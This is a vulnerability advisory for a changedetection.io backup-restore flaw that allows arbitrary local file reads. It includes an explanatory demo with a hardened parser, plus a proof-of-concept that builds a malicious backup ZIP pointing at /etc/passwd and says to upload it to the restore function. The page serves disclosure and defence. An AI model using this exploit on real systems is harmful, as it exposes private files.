Security Vulnerability Report
CVE-2026-43891 CVSS 7.5 HIGH

Published: 2026-05-12 18:17:28
Last Modified: 2026-05-13 18:23:28

Description

changedetection.io is a free open source web page change detection tool. Versions prior to 0.55.1 trust attacker-controlled snapshot paths restored from backup files (CWE-73, external control of a file name or path). The vulnerable flow starts in the backup restore logic: when a backup ZIP is restored, the application extracts the archive and copies each restored watch UUID directory directly into the live datastore with shutil.copytree(entry.path, dst_dir). This preserves every attacker-controlled file inside the restored watch directory, including history.txt, the per-watch index that records where each snapshot is stored. After the restore, the watch history property parses history.txt, follows the recorded snapshot path, and returns the contents of the targeted local file. The CVSS vector records a network-reachable path with no privileges and no user interaction required, and a high confidentiality impact with no integrity or availability impact, which is consistent with an arbitrary file read limited to what the application process can open. This vulnerability is fixed in 0.55.1.
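
The flow above, as an added example that is not changedetection.io's own code: a backup archive is built whose watch UUID directory carries an attacker-written history.txt, it is restored the way the advisory describes (extract, then shutil.copytree of each UUID directory into the datastore), and the restored history.txt is then read by two parsers, one that trusts the recorded snapshot path and one that confines it to the watch directory. The one-entry-per-line "timestamp,snapshot_path" layout, the function names, the watch UUID and the stand-in secret file are assumptions made for this example; the advisory only says that history.txt is parsed and the recorded path is read.

```python
import io
import os
import shutil
import tempfile
import zipfile
from pathlib import Path

# Assumed history.txt layout for this example: one "timestamp,snapshot_path" line per entry.
HISTORY_NAME = "history.txt"


def build_backup(watch_uuid: str, snapshot_path: str) -> bytes:
    """Build a backup ZIP whose watch UUID directory holds an attacker-written history.txt.

    The single entry names snapshot_path instead of a snapshot file inside the watch dir.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{watch_uuid}/{HISTORY_NAME}", f"1700000000,{snapshot_path}\n")
    return buf.getvalue()


def restore_backup(backup: bytes, datastore: Path) -> None:
    """Model of the restore step in the advisory: extract the archive, then copy each
    top-level watch UUID directory into the live datastore with shutil.copytree()."""
    with tempfile.TemporaryDirectory() as tmp:
        with zipfile.ZipFile(io.BytesIO(backup)) as zf:
            zf.extractall(tmp)
        for entry in os.scandir(tmp):
            if entry.is_dir():
                shutil.copytree(entry.path, datastore / entry.name, dirs_exist_ok=True)


def parse_history(watch_dir: Path) -> dict[str, str]:
    """Vulnerable parser: every path recorded in history.txt is accepted as written."""
    history: dict[str, str] = {}
    for line in (watch_dir / HISTORY_NAME).read_text(encoding="utf-8").splitlines():
        if "," in line:
            ts, path = line.strip().split(",", 1)
            history[ts] = path
    return history


def parse_history_hardened(watch_dir: Path) -> dict[str, str]:
    """Hardened parser: a recorded path is kept only if, resolved against the watch
    directory, it is a regular file directly inside that directory. Absolute paths,
    '..' components and symlinks that escape the directory are all dropped."""
    root = watch_dir.resolve()
    history: dict[str, str] = {}
    for line in (watch_dir / HISTORY_NAME).read_text(encoding="utf-8").splitlines():
        if "," not in line:
            continue
        ts, path = line.strip().split(",", 1)
        candidate = (root / path).resolve()   # an absolute entry replaces root here; resolve() exposes that
        if candidate.parent != root or not candidate.is_file():
            continue
        history[ts] = str(candidate)
    return history


def snapshot_contents(history: dict[str, str]) -> dict[str, str]:
    """What a snapshot view returns when it opens each recorded path."""
    return {ts: Path(p).read_text(encoding="utf-8")
            for ts, p in history.items() if Path(p).is_file()}


def demo() -> tuple[dict[str, str], dict[str, str]]:
    """Run the whole flow in a scratch directory; returns (leaked, blocked)."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        secret = base / "secret.txt"          # constructed stand-in for a file such as /etc/passwd
        secret.write_text("sensitive-data\n", encoding="utf-8")
        datastore = base / "datastore"
        datastore.mkdir()
        uuid = "poc-watch-uuid"               # hypothetical watch UUID
        restore_backup(build_backup(uuid, str(secret)), datastore)
        watch_dir = datastore / uuid
        leaked = snapshot_contents(parse_history(watch_dir))
        blocked = snapshot_contents(parse_history_hardened(watch_dir))
        return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("trusting parser returned:", leaked)    # {'1700000000': 'sensitive-data\n'}
    print("hardened parser returned:", blocked)   # {}
```

The hardened parser deliberately checks the resolved path's parent against the resolved watch directory rather than doing a string prefix comparison, so a symlink planted inside the restored directory cannot redirect the read either; the same confinement belongs in the restore step itself, which should reject archive members that are not regular files under a single UUID directory.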

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

changedetection.io < 0.55.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile

# Name of the watch UUID directory inside the archive; on restore, each top-level
# directory is copied into the live datastore with shutil.copytree().
malicious_dir = 'poc_watch_uuid'

# Equivalent shell recipe on a Unix-like system (zip -y stores the link itself,
# not the file it points to):
#   mkdir poc_watch_uuid
#   ln -s /etc/passwd poc_watch_uuid/history.txt
#   zip -y malicious_backup.zip poc_watch_uuid/history.txt

with zipfile.ZipFile('malicious_backup.zip', 'w') as zf:
    # Write a symlink entry named history.txt that points at /etc/passwd.
    # A forward slash is used explicitly so the entry name is the same on every OS.
    info = zipfile.ZipInfo(malicious_dir + '/history.txt')
    info.create_system = 3                 # 3 = Unix, so external_attr carries a st_mode
    info.external_attr = 0o120777 << 16    # S_IFLNK | 0777: flags the entry as a symlink
    zf.writestr(info, b'/etc/passwd')      # a symlink entry's data is its target path

# Caveat: Python's zipfile.extractall() does not recreate symlinks; it writes the
# target string above into a regular file named history.txt. The link only takes
# effect if the restore path unpacks with a tool that honours link entries, in which
# case shutil.copytree() (symlinks=False by default) copies the content of the link's
# target into the datastore. The advisory itself describes a different primitive:
# a restored history.txt whose recorded snapshot paths point at arbitrary local files.

print("Malicious backup 'malicious_backup.zip' created.")
print("Upload this file to the changedetection.io restore function.")

References

https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-8757-69j2-hx56
https://github.com/pocket-id/pocket-id/security/advisories/GHSA-w6p7-2fxx-4f44

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43891", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:28.493", "lastModified": "2026-05-13T18:23:27.920", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "changedetection.io is a free open source web page change detection tool. Prior to 0.55.1, the vulnerability is caused by trusting attacker-controlled snapshot paths restored from backup files. The vulnerable flow starts in the backup restore logic. When a backup ZIP is restored, the application extracts the archive and copies each restored watch UUID directory directly into the live datastore using shutil.copytree(entry.path, dst_dir). This preserves attacker-controlled files inside the restored watch directory, including history.txt. After restore, the application parses history.txt in the watch history property and returns the contents of the targeted local file. This vulnerability is fixed in 0.55.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-8757-69j2-hx56", "source": "[email protected]"}, {"url": "https://github.com/pocket-id/pocket-id/security/advisories/GHSA-w6p7-2fxx-4f44", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}